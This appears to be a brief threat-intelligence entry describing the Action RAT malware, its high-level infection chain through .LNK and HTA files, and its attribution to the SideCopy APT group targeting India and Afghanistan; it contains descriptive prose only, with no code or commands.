Action RAT

Action RAT is a malicious software (malware) used by cyber threat actors to exploit and damage computer systems. This malware, written in Delphi and compiled on October 2, 2021, is part of an arsenal that includes other Remote Access Trojans (RATs) such as AllaKore RAT, Reverse RAT, and Margulas RAT. It infects systems through deceptive means such as suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside a system, Action RAT can steal personal information, disrupt operations, or hold data for ransom. The malware employs fileless payload execution via .hta files to deploy one of the associated RATs, such as AllaKore or Action Rat. Throughout the year, new attack campaigns involving Action RAT have been observed almost monthly, with evolving tactics, techniques, and procedures (TTPs). These include additional stages with Double Action RAT, a new .NET-based RAT, and uncovered instances of PowerShell remote execution. Infection typically begins with the execution of a .LNK file, which retrieves an HTML application from a remote server. This application presents a decoy while stealthily deploying the Action RAT backdoor. The malware then initiates a concatenation operation involving multiple HTML applications, ultimately resulting in the drop of an Action Rat variant whose files mimic essential Windows components. The use of Action RAT has been linked to SideCopy, an advanced persistent threat (APT) group known for targeting India and Afghanistan. This group has employed Action RAT in numerous attacks against India, using spear-phishing for initial entry and presenting research material as a decoy to plant the info-stealing malware. Detailed analysis of these campaigns and the payloads involved can be found in previous whitepapers and blog posts provided by our team.